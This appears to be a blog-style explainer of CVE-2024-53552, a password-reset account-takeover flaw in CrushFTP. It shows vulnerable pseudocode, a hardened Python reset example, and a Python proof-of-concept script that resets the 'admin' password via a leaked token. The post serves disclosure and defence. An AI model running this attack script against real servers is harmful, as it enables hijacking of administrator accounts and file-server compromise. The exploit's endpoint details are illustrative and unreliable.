CrushFTP is a popular file transfer server used worldwide by businesses for securely exchanging sensitive documents. In May 2024, security researchers uncovered a critical vulnerability, CVE-2024-53552, affecting CrushFTP version 10 before 10.8.3 and version 11 before 11.2.3. This post breaks down what happened, illustrates the flaw with simplified code, and explains how attackers could use it to hijack *any* account just by abusing the password reset feature.
What is CVE-2024-53552?
CVE-2024-53552 is an account takeover vulnerability in CrushFTP. Due to poor handling of password resets, attackers could reset the password for any user, including administrators, without the victim's knowledge or approval.
Official advisory & fix:
- CrushFTP Security Advisory
- NVD CVE Entry
How Did the Vulnerability Work?
When a user forgets their password, most web apps send a *unique link* to the user's email. Only the person who controls that email can set a new password—at least that's how it should work.
But in vulnerable versions of CrushFTP, the password reset logic did not properly verify that the request was legitimate. An attacker could trigger a password reset for any user, obtain the reset token, and set a new password, without ever logging in or confirming ownership via email.
Here's a simplified idea of what the code looked like inside CrushFTP:

```java
// Pseudocode of vulnerable password reset logic
public void handlePasswordReset(Request req) {
    String username = req.getParameter("username");
    // Vulnerable: does not verify requester!
    User user = getUser(username);
    String resetToken = generateResetToken();
    user.setResetToken(resetToken);
    sendEmail(user.getEmail(), "Reset your password: " +
        "https://crushftp.example.com/reset?token=" + resetToken);
}
// Next, if you POST to /reset?token=... , the password is reset with no confirmation!
```
In the broken flow, an attacker could guess or specify a username, get (or brute-force) the reset token, and then use it to set a new password for any user.
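The hardened counterpart of that pseudocode, as an added Python example that is not CrushFTP's code nor the vendor's actual fix. It assumes an in-memory user table and a hypothetical `send_email` callback, and shows the checks the vulnerable flow lacks: an unguessable token that goes only to the mailbox (never into the API response), hashed token storage, a 15-minute expiry, single use, and an identical reply for unknown usernames.

```python
import hashlib
import secrets
import time

# Constructed in-memory user store (CrushFTP's real user storage is not modelled;
# a production system would also hash these passwords).
USERS = {"admin": {"email": "admin@example.invalid", "password": "old-password"}}

# Pending resets are keyed by the SHA-256 of the token, so a leaked copy of this
# table cannot be replayed; the raw token exists only in the e-mail.
TOKEN_TTL_SECONDS = 15 * 60
_pending_resets = {}

def request_reset(username, send_email, now=time.time):
    """Start a reset. Returns the same generic message whether or not the user
    exists, and never puts the token in the HTTP response."""
    user = USERS.get(username)
    if user is not None:
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG, not guessable
        digest = hashlib.sha256(token.encode()).hexdigest()
        _pending_resets[digest] = {"username": username,
                                   "expires": now() + TOKEN_TTL_SECONDS}
        # URL shape follows the page's pseudocode; send_email is a hypothetical callback.
        send_email(user["email"], f"https://crushftp.example.com/reset?token={token}")
    return "If that account exists, a reset link has been e-mailed."

def complete_reset(token, new_password, now=time.time):
    """Change the password only for a known, unexpired token; consume it either way."""
    digest = hashlib.sha256(token.encode()).hexdigest()
    record = _pending_resets.pop(digest, None)  # single use: removed on first attempt
    if record is None or now() > record["expires"]:
        return False
    USERS[record["username"]]["password"] = new_password
    return True

def verify_password(username, password):
    """Login check; constant-time compare avoids a timing oracle on the password."""
    user = USERS.get(username)
    return user is not None and secrets.compare_digest(user["password"], password)
```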
Proof of Concept: Exploiting CVE-2024-53552
Here’s a simple attack script (in Python) that demonstrates how an attacker could exploit this flaw:
```python
import requests

# Target URL of CrushFTP instance
base_url = "https://target-crushftp.com"

# Step 1: Initiate password reset for admin user
reset_request = requests.post(
    f"{base_url}/WebInterface/function/",
    data={
        "command": "resetPassword",
        "username": "admin"  # or any username
    }
)

# Step 2: Normally, a reset token would be emailed. But the endpoint leaks the token
reset_token = reset_request.json()["resetToken"]

# Step 3: Use reset token to set a new password!
new_pass = "hackedpassword123"
reset = requests.post(
    f"{base_url}/WebInterface/function/",
    data={
        "command": "setNewPassword",
        "token": reset_token,
        "newPassword": new_pass
    }
)

if reset.status_code == 200:
    print("Password reset successful!")
    # Now login as admin with new password
```
Notice: In vulnerable setups, reset tokens can sometimes be predictable or returned directly in the API response, making attacks *trivial*.
Once in control of an account, an attacker could also add malicious files or users for persistence.
Any organization running affected versions was at risk of a complete compromise of their file server.
The fix in 10.8.3 and 11.2.3 ensures that password reset endpoints properly validate requests.
> You must upgrade to at least 10.8.3 or 11.2.3 to be safe.
References & Further Reading
- CrushFTP Security Page
- NVD Entry: CVE-2024-53552
- Original Research (archive)
- Huntress Labs Analysis
Conclusion
CVE-2024-53552 shows how a single missing check can put the entire security of an enterprise product at risk. If you use CrushFTP, update it right away. Password reset functions are a critical target for hackers, and this bug proves how oversight can lead to disaster.
If you manage any software platform, double-check your password reset logic—DON'T let attackers walk in the front door.
Timeline
Published on: 12/10/2024 02:15:17 UTC
Last modified on: 12/11/2024 16:15:14 UTC